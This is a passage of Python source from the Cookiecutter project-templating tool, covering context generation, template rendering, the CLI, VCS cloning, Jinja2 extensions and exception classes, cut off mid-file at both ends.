isinstance(context_value, bool) and isinstance(overwrite, str): # We are dealing with a boolean variable # Convert overwrite to its boolean counterpart try: context[variable] = YesNoPrompt().process_response(overwrite) except InvalidResponse as err: msg = ( f"{overwrite} provided for variable " f"{variable} could not be converted to a boolean." ) raise ValueError(msg) from err else: # Simply overwrite the value for this variable context[variable] = overwrite def generate_context( context_file: str = 'cookiecutter.json', default_context: dict[str, Any] | None = None, extra_context: dict[str, Any] | None = None, ) -> dict[str, Any]: """Generate the context for a Cookiecutter project template. Loads the JSON file as a Python object, with key being the JSON filename. :param context_file: JSON file containing key/value pairs for populating the cookiecutter's variables. :param default_context: Dictionary containing config to take into account. :param extra_context: Dictionary containing configuration overrides """ context = OrderedDict([]) try: with open(context_file, encoding='utf-8') as file_handle: obj = json.load(file_handle, object_pairs_hook=OrderedDict) except ValueError as e: # JSON decoding error. Let's throw a new exception that is more # friendly for the developer or user. full_fpath = os.path.abspath(context_file) json_exc_message = str(e) our_exc_message = ( f"JSON decoding error while loading '{full_fpath}'. 
" f"Decoding error details: '{json_exc_message}'" ) raise ContextDecodingException(our_exc_message) from e # Add the Python object to the context dictionary file_name = os.path.split(context_file)[1] file_stem = file_name.split('.')[0] context[file_stem] = obj # Overwrite context variable defaults with the default context from the # user's global config, if available if default_context: try: apply_overwrites_to_context(obj, default_context) except ValueError as error: warnings.warn(f"Invalid default received: {error}") if extra_context: apply_overwrites_to_context(obj, extra_context) logger.debug('Context generated is %s', context) return context def generate_file( project_dir: str, infile: str, context: dict[str, Any], env: Environment, skip_if_file_exists: bool = False, ) -> None: """Render filename of infile as name of outfile, handle infile correctly. Dealing with infile appropriately: a. If infile is a binary file, copy it over without rendering. b. If infile is a text file, render its contents and write the rendered infile to outfile. Precondition: When calling `generate_file()`, the root template dir must be the current working directory. Using `utils.work_in()` is the recommended way to perform this directory change. :param project_dir: Absolute path to the resulting generated project. :param infile: Input file to generate the file from. Relative to the root template dir. :param context: Dict for populating the cookiecutter's variables. :param env: Jinja2 template execution environment. """ logger.debug('Processing file %s', infile) # Render the path to the output file (not including the root project dir) outfile_tmpl = env.from_string(infile) outfile = os.path.join(project_dir, outfile_tmpl.render(**context)) file_name_is_empty = os.path.isdir(outfile) if file_name_is_empty: logger.debug('The resulting file name is empty: %s', outfile) return if skip_if_file_exists and os.path.exists(outfile): logger.debug('The resulting file already exists: %s', outfile) return logger.debug('Created file at %s', outfile) # Just copy over binary files. Don't render. logger.debug("Check %s to see if it's a binary", infile) if is_binary(infile): logger.debug('Copying binary %s to %s without rendering', infile, outfile) shutil.copyfile(infile, outfile) shutil.copymode(infile, outfile) return # Force fwd slashes on Windows for get_template # This is a by-design Jinja issue infile_fwd_slashes = infile.replace(os.path.sep, '/') # Render the file try: tmpl = env.get_template(infile_fwd_slashes) except TemplateSyntaxError as exception: # Disable translated so that printed exception contains verbose # information about syntax error location exception.translated = False raise rendered_file = tmpl.render(**context) if context['cookiecutter'].get('_new_lines', False): # Use `_new_lines` from context, if configured. newline = context['cookiecutter']['_new_lines'] logger.debug('Using configured newline character %s', repr(newline)) else: # Detect original file newline to output the rendered file. # Note that newlines can be a tuple if file contains mixed line endings. # In this case, we pick the first line ending we detected. with open(infile, encoding='utf-8') as rd: rd.readline() # Read only the first line to load a 'newlines' value. 
newline = rd.newlines[0] if isinstance(rd.newlines, tuple) else rd.newlines logger.debug('Using detected newline character %s', repr(newline)) logger.debug('Writing contents to file %s', outfile) with open(outfile, 'w', encoding='utf-8', newline=newline) as fh: # noqa: FURB103 (false positive for python < 3.10) fh.write(rendered_file) # Apply file permissions to output file shutil.copymode(infile, outfile) def render_and_create_dir( dirname: str, context: dict[str, Any], output_dir: Path | str, environment: Environment, overwrite_if_exists: bool = False, ) -> tuple[Path, bool]: """Render name of a directory, create the directory, return its path.""" if not dirname or dirname == "": msg = 'Error: directory name is empty' raise EmptyDirNameException(msg) name_tmpl = environment.from_string(dirname) rendered_dirname = name_tmpl.render(**context) dir_to_create = Path(output_dir, rendered_dirname) logger.debug( 'Rendered dir %s must exist in output_dir %s', dir_to_create, output_dir ) output_dir_exists = dir_to_create.exists() if output_dir_exists: if overwrite_if_exists: logger.debug( 'Output directory %s already exists, overwriting it', dir_to_create ) else: msg = f'Error: "{dir_to_create}" directory already exists' raise OutputDirExistsException(msg) else: make_sure_path_exists(dir_to_create) return dir_to_create, not output_dir_exists def _run_hook_from_repo_dir( repo_dir: str, hook_name: str, project_dir: Path | str, context: dict[str, Any], delete_project_on_failure: bool, ) -> None: """Run hook from repo directory, clean project directory if hook fails. :param repo_dir: Project template input directory. :param hook_name: The hook to execute. :param project_dir: The directory to execute the script from. :param context: Cookiecutter project context. :param delete_project_on_failure: Delete the project directory on hook failure? """ warnings.warn( "The '_run_hook_from_repo_dir' function is deprecated, " "use 'cookiecutter.hooks.run_hook_from_repo_dir' instead", DeprecationWarning, 2, ) run_hook_from_repo_dir( repo_dir, hook_name, project_dir, context, delete_project_on_failure ) def generate_files( repo_dir: Path | str, context: dict[str, Any] | None = None, output_dir: Path | str = '.', overwrite_if_exists: bool = False, skip_if_file_exists: bool = False, accept_hooks: bool = True, keep_project_on_failure: bool = False, ) -> str: """Render the templates and saves them to files. :param repo_dir: Project template input directory. :param context: Dict for populating the template's variables. :param output_dir: Where to output the generated project dir into. :param overwrite_if_exists: Overwrite the contents of the output directory if it exists. :param skip_if_file_exists: Skip the files in the corresponding directories if they already exist :param accept_hooks: Accept pre and post hooks if set to `True`. :param keep_project_on_failure: If `True` keep generated project directory even when generation fails """ context = context or OrderedDict([]) env = create_env_with_context(context) template_dir = find_template(repo_dir, env) logger.debug('Generating project from %s...', template_dir) unrendered_dir = os.path.split(template_dir)[1] try: project_dir: Path | str project_dir, output_directory_created = render_and_create_dir( unrendered_dir, context, output_dir, env, overwrite_if_exists ) except UndefinedError as err: msg = f"Unable to create project directory '{unrendered_dir}'" raise UndefinedVariableInTemplate(msg, err, context) from err # We want the Jinja path and the OS paths to match. 
Consequently, we'll: # + CD to the template folder # + Set Jinja's path to '.' # # In order to build our files to the correct folder(s), we'll use an # absolute path for the target folder (project_dir) project_dir = os.path.abspath(project_dir) logger.debug('Project directory is %s', project_dir) # if we created the output directory, then it's ok to remove it # if rendering fails delete_project_on_failure = output_directory_created and not keep_project_on_failure if accept_hooks: run_hook_from_repo_dir( repo_dir, 'pre_gen_project', project_dir, context, delete_project_on_failure ) with work_in(template_dir): env.loader = FileSystemLoader(['.', '../templates']) for root, dirs, files in os.walk('.'): # We must separate the two types of dirs into different lists. # The reason is that we don't want ``os.walk`` to go through the # unrendered directories, since they will just be copied. copy_dirs = [] render_dirs = [] for d in dirs: d_ = os.path.normpath(os.path.join(root, d)) # We check the full path, because that's how it can be # specified in the ``_copy_without_render`` setting, but # we store just the dir name if is_copy_only_path(d_, context): logger.debug('Found copy only path %s', d) copy_dirs.append(d) else: render_dirs.append(d) for copy_dir in copy_dirs: indir = os.path.normpath(os.path.join(root, copy_dir)) outdir = os.path.normpath(os.path.join(project_dir, indir)) outdir = env.from_string(outdir).render(**context) logger.debug('Copying dir %s to %s without rendering', indir, outdir) # The outdir is not the root dir, it is the dir which marked as copy # only in the config file. If the program hits this line, which means # the overwrite_if_exists = True, and root dir exists if os.path.isdir(outdir): shutil.rmtree(outdir) shutil.copytree(indir, outdir) # We mutate ``dirs``, because we only want to go through these dirs # recursively dirs[:] = render_dirs for d in dirs: unrendered_dir = os.path.join(project_dir, root, d) try: render_and_create_dir( unrendered_dir, context, output_dir, env, overwrite_if_exists ) except UndefinedError as err: if delete_project_on_failure: rmtree(project_dir) _dir = os.path.relpath(unrendered_dir, output_dir) msg = f"Unable to create directory '{_dir}'" raise UndefinedVariableInTemplate(msg, err, context) from err for f in files: infile = os.path.normpath(os.path.join(root, f)) if is_copy_only_path(infile, context): outfile_tmpl = env.from_string(infile) outfile_rendered = outfile_tmpl.render(**context) outfile = os.path.join(project_dir, outfile_rendered) logger.debug( 'Copying file %s to %s without rendering', infile, outfile ) shutil.copyfile(infile, outfile) shutil.copymode(infile, outfile) continue try: generate_file( project_dir, infile, context, env, skip_if_file_exists ) except UndefinedError as err: if delete_project_on_failure: rmtree(project_dir) msg = f"Unable to create file '{infile}'" raise UndefinedVariableInTemplate(msg, err, context) from err if accept_hooks: run_hook_from_repo_dir( repo_dir, 'post_gen_project', project_dir, context, delete_project_on_failure, ) return project_dir File: cookiecutter/__init__.py """Main package for Cookiecutter.""" from pathlib import Path def _get_version() -> str: """Read VERSION.txt and return its contents.""" path = Path(__file__).parent.resolve() version_file = path / "VERSION.txt" return version_file.read_text(encoding="utf-8").strip() __version__ = _get_version() File: cookiecutter/extensions.py """Jinja2 extensions.""" from __future__ import annotations import json import string import uuid from 
secrets import choice from typing import TYPE_CHECKING, Any, Iterable import arrow from jinja2 import Environment, nodes from jinja2.ext import Extension from slugify import slugify as pyslugify from slugify.slugify import DEFAULT_SEPARATOR if TYPE_CHECKING: import re from jinja2.parser import Parser class JsonifyExtension(Extension): """Jinja2 extension to convert a Python object to JSON.""" def __init__(self, environment: Environment) -> None: """Initialize the extension with the given environment.""" super().__init__(environment) def jsonify(obj: Any, indent: int = 4) -> str: return json.dumps(obj, sort_keys=True, indent=indent) environment.filters['jsonify'] = jsonify class RandomStringExtension(Extension): """Jinja2 extension to create a random string.""" def __init__(self, environment: Environment) -> None: """Jinja2 Extension Constructor.""" super().__init__(environment) def random_ascii_string(length: int, punctuation: bool = False) -> str: if punctuation: corpus = f'{string.ascii_letters}{string.punctuation}' else: corpus = string.ascii_letters return "".join(choice(corpus) for _ in range(length)) environment.globals.update(random_ascii_string=random_ascii_string) class SlugifyExtension(Extension): """Jinja2 Extension to slugify string.""" def __init__(self, environment: Environment) -> None: """Jinja2 Extension constructor.""" super().__init__(environment) def slugify( value: str, entities: bool = True, decimal: bool = True, hexadecimal: bool = True, max_length: int = 0, word_boundary: bool = False, separator: str = DEFAULT_SEPARATOR, save_order: bool = False, stopwords: Iterable[str] = (), regex_pattern: re.Pattern[str] | str | None = None, lowercase: bool = True, replacements: Iterable[Iterable[str]] = (), allow_unicode: bool = False, ) -> str: """Slugifies the value.""" return pyslugify( value, entities, decimal, hexadecimal, max_length, word_boundary, separator, save_order, stopwords, regex_pattern, lowercase, replacements, allow_unicode, ) environment.filters['slugify'] = slugify class UUIDExtension(Extension): """Jinja2 Extension to generate uuid4 string.""" def __init__(self, environment: Environment) -> None: """Jinja2 Extension constructor.""" super().__init__(environment) def uuid4() -> str: """Generate UUID4.""" return str(uuid.uuid4()) environment.globals.update(uuid4=uuid4) class TimeExtension(Extension): """Jinja2 Extension for dates and times.""" tags = {'now'} def __init__(self, environment: Environment) -> None: """Jinja2 Extension constructor.""" super().__init__(environment) environment.extend(datetime_format='%Y-%m-%d') def _datetime( self, timezone: str, operator: str, offset: str, datetime_format: str | None, ) -> str: d = arrow.now(timezone) # parse shift params from offset and include operator shift_params = {} for param in offset.split(','): interval, value = param.split('=') shift_params[interval.strip()] = float(operator + value.strip()) d = d.shift(**shift_params) if datetime_format is None: datetime_format = self.environment.datetime_format # type: ignore[attr-defined] return d.strftime(datetime_format) def _now(self, timezone: str, datetime_format: str | None) -> str: if datetime_format is None: datetime_format = self.environment.datetime_format # type: ignore[attr-defined] return arrow.now(timezone).strftime(datetime_format) def parse(self, parser: Parser) -> nodes.Output: """Parse datetime template and add datetime value.""" lineno = next(parser.stream).lineno node = parser.parse_expression() if parser.stream.skip_if('comma'): datetime_format = 
parser.parse_expression() else: datetime_format = nodes.Const(None) if isinstance(node, nodes.Add): call_method = self.call_method( '_datetime', [node.left, nodes.Const('+'), node.right, datetime_format], lineno=lineno, ) elif isinstance(node, nodes.Sub): call_method = self.call_method( '_datetime', [node.left, nodes.Const('-'), node.right, datetime_format], lineno=lineno, ) else: call_method = self.call_method( '_now', [node, datetime_format], lineno=lineno, ) return nodes.Output([call_method], lineno=lineno) File: cookiecutter/replay.py """ cookiecutter.replay. ------------------- """ from __future__ import annotations import json import os from typing import TYPE_CHECKING, Any from cookiecutter.utils import make_sure_path_exists if TYPE_CHECKING: from pathlib import Path def get_file_name(replay_dir: Path | str, template_name: str) -> str: """Get the name of file.""" suffix = '.json' if not template_name.endswith('.json') else '' file_name = f'{template_name}{suffix}' return os.path.join(replay_dir, file_name) def dump(replay_dir: Path | str, template_name: str, context: dict[str, Any]) -> None: """Write json data to file.""" make_sure_path_exists(replay_dir) if 'cookiecutter' not in context: msg = 'Context is required to contain a cookiecutter key' raise ValueError(msg) replay_file = get_file_name(replay_dir, template_name) with open(replay_file, 'w', encoding="utf-8") as outfile: json.dump(context, outfile, indent=2) def load(replay_dir: Path | str, template_name: str) -> dict[str, Any]: """Read json data from file.""" replay_file = get_file_name(replay_dir, template_name) with open(replay_file, encoding="utf-8") as infile: context: dict[str, Any] = json.load(infile) if 'cookiecutter' not in context: msg = 'Context is required to contain a cookiecutter key' raise ValueError(msg) return context File: cookiecutter/cli.py """Main `cookiecutter` CLI.""" from __future__ import annotations import json import os import sys from collections import OrderedDict from typing import TYPE_CHECKING, Any if TYPE_CHECKING: from collections.abc import Iterable from click import Context, Parameter from typing_extensions import Literal import click from cookiecutter import __version__ from cookiecutter.config import get_user_config from cookiecutter.exceptions import ( ContextDecodingException, EmptyDirNameException, FailedHookException, InvalidModeException, InvalidZipRepository, OutputDirExistsException, RepositoryCloneFailed, RepositoryNotFound, UndefinedVariableInTemplate, UnknownExtension, ) from cookiecutter.log import configure_logger from cookiecutter.main import cookiecutter def version_msg() -> str: """Return the Cookiecutter version, location and Python powering it.""" python_version = sys.version location = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) return f"Cookiecutter {__version__} from {location} (Python {python_version})" def validate_extra_context( _ctx: Context, _param: Parameter, value: Iterable[str] ) -> OrderedDict[str, str] | None: """Validate extra context.""" for string in value: if '=' not in string: msg = ( f"EXTRA_CONTEXT should contain items of the form key=value; " f"'{string}' doesn't match that form" ) raise click.BadParameter(msg) # Convert tuple -- e.g.: ('program_name=foobar', 'startsecs=66') # to dict -- e.g.: {'program_name': 'foobar', 'startsecs': '66'} return OrderedDict(s.split('=', 1) for s in value) or None def list_installed_templates( default_config: bool | dict[str, Any], passed_config_file: str | None ) -> None: """List installed (locally 
cloned) templates. Use cookiecutter --list-installed.""" config = get_user_config(passed_config_file, default_config) cookiecutter_folder: str = config['cookiecutters_dir'] if not os.path.exists(cookiecutter_folder): click.echo( f"Error: Cannot list installed templates. " f"Folder does not exist: {cookiecutter_folder}" ) sys.exit(-1) template_names = [ folder for folder in os.listdir(cookiecutter_folder) if os.path.exists( os.path.join(cookiecutter_folder, folder, 'cookiecutter.json') ) ] click.echo(f'{len(template_names)} installed templates: ') for name in template_names: click.echo(f' * {name}') @click.command(context_settings={"help_option_names": ['-h', '--help']}) @click.version_option(__version__, '-V', '--version', message=version_msg()) @click.argument('template', required=False) @click.argument('extra_context', nargs=-1, callback=validate_extra_context) @click.option( '--no-input', is_flag=True, help='Do not prompt for parameters and only use cookiecutter.json file content. ' 'Defaults to deleting any cached resources and redownloading them. ' 'Cannot be combined with the --replay flag.', ) @click.option( '-c', '--checkout', help='branch, tag or commit to checkout after git clone', ) @click.option( '--directory', help='Directory within repo that holds cookiecutter.json file ' 'for advanced repositories with multi templates in it', ) @click.option( '-v', '--verbose', is_flag=True, help='Print debug information', default=False ) @click.option( '--replay', is_flag=True, help='Do not prompt for parameters and only use information entered previously. ' 'Cannot be combined with the --no-input flag or with extra configuration passed.', ) @click.option( '--replay-file', type=click.Path(), default=None, help='Use this file for replay instead of the default.', ) @click.option( '-f', '--overwrite-if-exists', is_flag=True, help='Overwrite the contents of the output directory if it already exists', ) @click.option( '-s', '--skip-if-file-exists', is_flag=True, help='Skip the files in the corresponding directories if they already exist', default=False, ) @click.option( '-o', '--output-dir', default='.', type=click.Path(), help='Where to output the generated project dir into', ) @click.option( '--config-file', type=click.Path(), default=None, help='User configuration file' ) @click.option( '--default-config', is_flag=True, help='Do not load a config file. Use the defaults instead', ) @click.option( '--debug-file', type=click.Path(), default=None, help='File to be used as a stream for DEBUG logging', ) @click.option( '--accept-hooks', type=click.Choice(['yes', 'ask', 'no']), default='yes', help='Accept pre/post hooks', ) @click.option( '-l', '--list-installed', is_flag=True, help='List currently installed templates.' ) @click.option( '--keep-project-on-failure', is_flag=True, help='Do not delete project folder on failure', ) def main( template: str, extra_context: dict[str, Any], no_input: bool, checkout: str, verbose: bool, replay: bool | str, overwrite_if_exists: bool, output_dir: str, config_file: str | None, default_config: bool, debug_file: str | None, directory: str, skip_if_file_exists: bool, accept_hooks: Literal['yes', 'ask', 'no'], replay_file: str | None, list_installed: bool, keep_project_on_failure: bool, ) -> None: """Create a project from a Cookiecutter project template (TEMPLATE). Cookiecutter is free and open source software, developed and managed by volunteers. If you would like to help out or fund the project, please get in touch at https://github.com/cookiecutter/cookiecutter. 
""" # Commands that should work without arguments if list_installed: list_installed_templates(default_config, config_file) sys.exit(0) # Raising usage, after all commands that should work without args. if not template or template.lower() == 'help': click.echo(click.get_current_context().get_help()) sys.exit(0) configure_logger(stream_level='DEBUG' if verbose else 'INFO', debug_file=debug_file) # If needed, prompt the user to ask whether or not they want to execute # the pre/post hooks. if accept_hooks == "ask": _accept_hooks = click.confirm("Do you want to execute hooks?") else: _accept_hooks = accept_hooks == "yes" if replay_file: replay = replay_file try: cookiecutter( template, checkout, no_input, extra_context=extra_context, replay=replay, overwrite_if_exists=overwrite_if_exists, output_dir=output_dir, config_file=config_file, default_config=default_config, password=os.environ.get('COOKIECUTTER_REPO_PASSWORD'), directory=directory, skip_if_file_exists=skip_if_file_exists, accept_hooks=_accept_hooks, keep_project_on_failure=keep_project_on_failure, ) except ( ContextDecodingException, OutputDirExistsException, EmptyDirNameException, InvalidModeException, FailedHookException, UnknownExtension, InvalidZipRepository, RepositoryNotFound, RepositoryCloneFailed, ) as e: click.echo(e) sys.exit(1) except UndefinedVariableInTemplate as undefined_err: click.echo(f'{undefined_err.message}') click.echo(f'Error message: {undefined_err.error.message}') context_str = json.dumps(undefined_err.context, indent=4, sort_keys=True) click.echo(f'Context: {context_str}') sys.exit(1) if __name__ == "__main__": main() File: cookiecutter/utils.py """Helper functions used throughout Cookiecutter.""" from __future__ import annotations import contextlib import logging import os import shutil import stat import tempfile from pathlib import Path from typing import TYPE_CHECKING, Any, Iterator from jinja2.ext import Extension from cookiecutter.environment import StrictEnvironment if TYPE_CHECKING: from jinja2 import Environment logger = logging.getLogger(__name__) def force_delete(func, path, _exc_info) -> None: # type: ignore[no-untyped-def] """Error handler for `shutil.rmtree()` equivalent to `rm -rf`. Usage: `shutil.rmtree(path, onerror=force_delete)` From https://docs.python.org/3/library/shutil.html#rmtree-example """ os.chmod(path, stat.S_IWRITE) func(path) def rmtree(path: Path | str) -> None: """Remove a directory and all its contents. Like rm -rf on Unix. :param path: A directory path. """ shutil.rmtree(path, onerror=force_delete) def make_sure_path_exists(path: Path | str) -> None: """Ensure that a directory exists. :param path: A directory tree path for creation. """ logger.debug('Making sure path exists (creates tree if not exist): %s', path) try: Path(path).mkdir(parents=True, exist_ok=True) except OSError as error: msg = f'Unable to create directory at {path}' raise OSError(msg) from error @contextlib.contextmanager def work_in(dirname: Path | str | None = None) -> Iterator[None]: """Context manager version of os.chdir. When exited, returns to the working directory prior to entering. """ curdir = os.getcwd() try: if dirname is not None: os.chdir(dirname) yield finally: os.chdir(curdir) def make_executable(script_path: Path | str) -> None: """Make `script_path` executable. 
:param script_path: The file to change """ status = os.stat(script_path) os.chmod(script_path, status.st_mode | stat.S_IEXEC) def simple_filter(filter_function) -> type[Extension]: # type: ignore[no-untyped-def] """Decorate a function to wrap it in a simplified jinja2 extension.""" class SimpleFilterExtension(Extension): def __init__(self, environment: Environment) -> None: super().__init__(environment) environment.filters[filter_function.__name__] = filter_function SimpleFilterExtension.__name__ = filter_function.__name__ return SimpleFilterExtension def create_tmp_repo_dir(repo_dir: Path | str) -> Path: """Create a temporary dir with a copy of the contents of repo_dir.""" repo_dir = Path(repo_dir).resolve() base_dir = tempfile.mkdtemp(prefix='cookiecutter') new_dir = f"{base_dir}/{repo_dir.name}" logger.debug(f'Copying repo_dir from {repo_dir} to {new_dir}') shutil.copytree(repo_dir, new_dir) return Path(new_dir) def create_env_with_context(context: dict[str, Any]) -> StrictEnvironment: """Create a jinja environment using the provided context.""" envvars = context.get('cookiecutter', {}).get('_jinja2_env_vars', {}) return StrictEnvironment(context=context, keep_trailing_newline=True, **envvars) File: cookiecutter/vcs.py """Helper functions for working with version control systems.""" from __future__ import annotations import logging import os import subprocess from pathlib import Path from shutil import which from typing import TYPE_CHECKING if TYPE_CHECKING: from typing_extensions import Literal from cookiecutter.exceptions import ( RepositoryCloneFailed, RepositoryNotFound, UnknownRepoType, VCSNotInstalled, ) from cookiecutter.prompt import prompt_and_delete from cookiecutter.utils import make_sure_path_exists logger = logging.getLogger(__name__) BRANCH_ERRORS = [ 'error: pathspec', 'unknown revision', ] def identify_repo(repo_url: str) -> tuple[Literal["git", "hg"], str]: """Determine if `repo_url` should be treated as a URL to a git or hg repo. Repos can be identified by prepending "hg+" or "git+" to the repo URL. :param repo_url: Repo URL of unknown type. :returns: ('git', repo_url), ('hg', repo_url), or None. """ repo_url_values = repo_url.split('+') if len(repo_url_values) == 2: repo_type = repo_url_values[0] if repo_type in ["git", "hg"]: return repo_type, repo_url_values[1] # type: ignore[return-value] raise UnknownRepoType if 'git' in repo_url: return 'git', repo_url if 'bitbucket' in repo_url: return 'hg', repo_url raise UnknownRepoType def is_vcs_installed(repo_type: str) -> bool: """ Check if the version control system for a repo type is installed. :param repo_type: """ return bool(which(repo_type)) def clone( repo_url: str, checkout: str | None = None, clone_to_dir: Path | str = ".", no_input: bool = False, ) -> str: """Clone a repo to the current directory. :param repo_url: Repo URL of unknown type. :param checkout: The branch, tag or commit ID to checkout after clone. :param clone_to_dir: The directory to clone to. Defaults to the current directory. :param no_input: Do not prompt for user input and eventually force a refresh of cached resources. :returns: str with path to the new directory of the repository. """ # Ensure that clone_to_dir exists clone_to_dir = Path(clone_to_dir).expanduser() make_sure_path_exists(clone_to_dir) # identify the repo_type repo_type, repo_url = identify_repo(repo_url) # check that the appropriate VCS for the repo_type is installed if not is_vcs_installed(repo_type): msg = f"'{repo_type}' is not installed." 
raise VCSNotInstalled(msg) repo_url = repo_url.rstrip('/') repo_name = os.path.split(repo_url)[1] if repo_type == 'git': repo_name = repo_name.split(':')[-1].rsplit('.git')[0] repo_dir = os.path.normpath(os.path.join(clone_to_dir, repo_name)) if repo_type == 'hg': repo_dir = os.path.normpath(os.path.join(clone_to_dir, repo_name)) logger.debug(f'repo_dir is {repo_dir}') if os.path.isdir(repo_dir): clone = prompt_and_delete(repo_dir, no_input=no_input) else: clone = True if clone: try: subprocess.check_output( [repo_type, 'clone', repo_url], cwd=clone_to_dir, stderr=subprocess.STDOUT, ) if checkout is not None: checkout_params = [checkout] # Avoid Mercurial "--config" and "--debugger" injection vulnerability if repo_type == "hg": checkout_params.insert(0, "--") subprocess.check_output( [repo_type, 'checkout', *checkout_params], cwd=repo_dir, stderr=subprocess.STDOUT, ) except subprocess.CalledProcessError as clone_error: output = clone_error.output.decode('utf-8') if 'not found' in output.lower(): msg = ( f'The repository {repo_url} could not be found, ' 'have you made a typo?' ) raise RepositoryNotFound(msg) from clone_error if any(error in output for error in BRANCH_ERRORS): msg = ( f'The {checkout} branch of repository ' f'{repo_url} could not found, have you made a typo?' ) raise RepositoryCloneFailed(msg) from clone_error logger.exception('git clone failed with error: %s', output) raise return repo_dir File: cookiecutter/environment.py """Jinja2 environment and extensions loading.""" from __future__ import annotations from typing import Any from jinja2 import Environment, StrictUndefined from cookiecutter.exceptions import UnknownExtension class ExtensionLoaderMixin: """Mixin providing sane loading of extensions specified in a given context. The context is being extracted from the keyword arguments before calling the next parent class in line of the child. """ def __init__(self, *, context: dict[str, Any] | None = None, **kwargs: Any) -> None: """Initialize the Jinja2 Environment object while loading extensions. Does the following: 1. Establishes default_extensions (currently just a Time feature) 2. Reads extensions set in the cookiecutter.json _extensions key. 3. Attempts to load the extensions. Provides useful error if fails. """ context = context or {} default_extensions = [ 'cookiecutter.extensions.JsonifyExtension', 'cookiecutter.extensions.RandomStringExtension', 'cookiecutter.extensions.SlugifyExtension', 'cookiecutter.extensions.TimeExtension', 'cookiecutter.extensions.UUIDExtension', ] extensions = default_extensions + self._read_extensions(context) try: super().__init__(extensions=extensions, **kwargs) # type: ignore[call-arg] except ImportError as err: msg = f'Unable to load extension: {err}' raise UnknownExtension(msg) from err def _read_extensions(self, context: dict[str, Any]) -> list[str]: """Return list of extensions as str to be passed on to the Jinja2 env. If context does not contain the relevant info, return an empty list instead. """ try: extensions = context['cookiecutter']['_extensions'] except KeyError: return [] else: return [str(ext) for ext in extensions] class StrictEnvironment(ExtensionLoaderMixin, Environment): """Create strict Jinja2 environment. Jinja2 environment will raise error on undefined variable in template- rendering context. """ def __init__(self, **kwargs: Any) -> None: """Set the standard Cookiecutter StrictEnvironment. Also loading extensions defined in cookiecutter.json's _extensions key. 
""" super().__init__(undefined=StrictUndefined, **kwargs) File: cookiecutter/exceptions.py """All exceptions used in the Cookiecutter code base are defined here.""" from __future__ import annotations from typing import TYPE_CHECKING, Any if TYPE_CHECKING: from jinja2 import TemplateError class CookiecutterException(Exception): """ Base exception class. All Cookiecutter-specific exceptions should subclass this class. """ class NonTemplatedInputDirException(CookiecutterException): """ Exception for when a project's input dir is not templated. The name of the input directory should always contain a string that is rendered to something else, so that input_dir != output_dir. """ class UnknownTemplateDirException(CookiecutterException): """ Exception for ambiguous project template directory. Raised when Cookiecutter cannot determine which directory is the project template, e.g. more than one dir appears to be a template dir. """ # unused locally class MissingProjectDir(CookiecutterException): """ Exception for missing generated project directory. Raised during cleanup when remove_repo() can't find a generated project directory inside of a repo. """ # unused locally class ConfigDoesNotExistException(CookiecutterException): """ Exception for missing config file. Raised when get_config() is passed a path to a config file, but no file is found at that path. """ class InvalidConfiguration(CookiecutterException): """ Exception for invalid configuration file. Raised if the global configuration file is not valid YAML or is badly constructed. """ class UnknownRepoType(CookiecutterException): """ Exception for unknown repo types. Raised if a repo's type cannot be determined. """ class VCSNotInstalled(CookiecutterException): """ Exception when version control is unavailable. Raised if the version control system (git or hg) is not installed. """ class ContextDecodingException(CookiecutterException): """ Exception for failed JSON decoding. Raised when a project's JSON context file can not be decoded. """ class OutputDirExistsException(CookiecutterException): """ Exception for existing output directory. Raised when the output directory of the project exists already. """ class EmptyDirNameException(CookiecutterException): """ Exception for a empty directory name. Raised when the directory name provided is empty. """ class InvalidModeException(CookiecutterException): """ Exception for incompatible modes. Raised when cookiecutter is called with both `no_input==True` and `replay==True` at the same time. """ class FailedHookException(CookiecutterException): """ Exception for hook failures. Raised when a hook script fails. """ class UndefinedVariableInTemplate(CookiecutterException): """ Exception for out-of-scope variables. Raised when a template uses a variable which is not defined in the context. """ def __init__( self, message: str, error: TemplateError, context: dict[str, Any] ) -> None: """Exception for out-of-scope variables.""" self.message = message self.error = error self.context = context def __str__(self) -> str: """Text representation of UndefinedVariableInTemplate.""" return ( f"{self.message}. " f"Error message: {self.error.message}. " f"Context: {self.context}" ) class UnknownExtension(CookiecutterException): """ Exception for un-importable extension. Raised when an environment is unable to import a required extension. """ class RepositoryNotFound(CookiecutterException): """ Exception for missing repo. Raised when the specified cookiecutter repository doesn't exist. 
""" class RepositoryCloneFailed(CookiecutterException): """ Exception for un-cloneable repo. Raised when a cookiecutter template can't be cloned. """ class InvalidZipRepository(CookiecutterException): """ Exception for bad zip repo. Raised when the specified cookiecutter repository isn't a valid Zip archive. """ File: cookiecutter/find.py """Functions for finding Cookiecutter templates and other components.""" from __future__ import annotations import logging import os from pathlib import Path from typing import TYPE_CHECKING from cookiecutter.exceptions import NonTemplatedInputDirException if TYPE_CHECKING: from jinja2 import Environment logger = logging.getLogger(__name__) def find_template(repo_dir: Path | str, env: Environment) -> Path: """Determine which child directory of ``repo_dir`` is the project template. :param repo_dir: Local directory of newly cloned repo. :return: Relative path to project template. """ logger.debug('Searching %s for the project template.', repo_dir) for str_path in os.listdir(repo_dir): if ( 'cookiecutter' in str_path and env.variable_start_string in str_path and env.variable_end_string in str_path ): project_template = Path(repo_dir, str_path) break else: raise NonTemplatedInputDirException logger.debug('The project template appears to be %s', project_template) return project_template File: cookiecutter/prompt.py """Functions for prompting the user for project info.""" from __future__ import annotations import json import os import re import sys from collections import OrderedDict from itertools import starmap from pathlib import Path from typing import TYPE_CHECKING, Any, Dict, Iterator, List, Union from jinja2.exceptions import UndefinedError from rich.prompt import Confirm, InvalidResponse, Prompt, PromptBase from typing_extensions import TypeAlias from cookiecutter.exceptions import UndefinedVariableInTemplate from cookiecutter.utils import create_env_with_context, rmtree if TYPE_CHECKING: from jinja2 import Environment def read_user_variable(var_name: str, default_value, prompts=None, prefix: str = ""): """Prompt user for variable and return the entered value or given default. :param str var_name: Variable of the context to query the user :param default_value: Value that will be returned if no input happens """ question = ( prompts[var_name] if prompts and var_name in prompts and prompts[var_name] else var_name ) while True: variable = Prompt.ask(f"{prefix}{question}", default=default_value) if variable is not None: break return variable class YesNoPrompt(Confirm): """A prompt that returns a boolean for yes/no questions.""" yes_choices = ["1", "true", "t", "yes", "y", "on"] no_choices = ["0", "false", "f", "no", "n", "off"] def process_response(self, value: str) -> bool: """Convert choices to a bool.""" value = value.strip().lower() if value in self.yes_choices: return True if value in self.no_choices: return False raise InvalidResponse(self.validate_error_message) def read_user_yes_no(var_name, default_value, prompts=None, prefix: str = ""): """Prompt the user to reply with 'yes' or 'no' (or equivalent values). - These input values will be converted to ``True``: 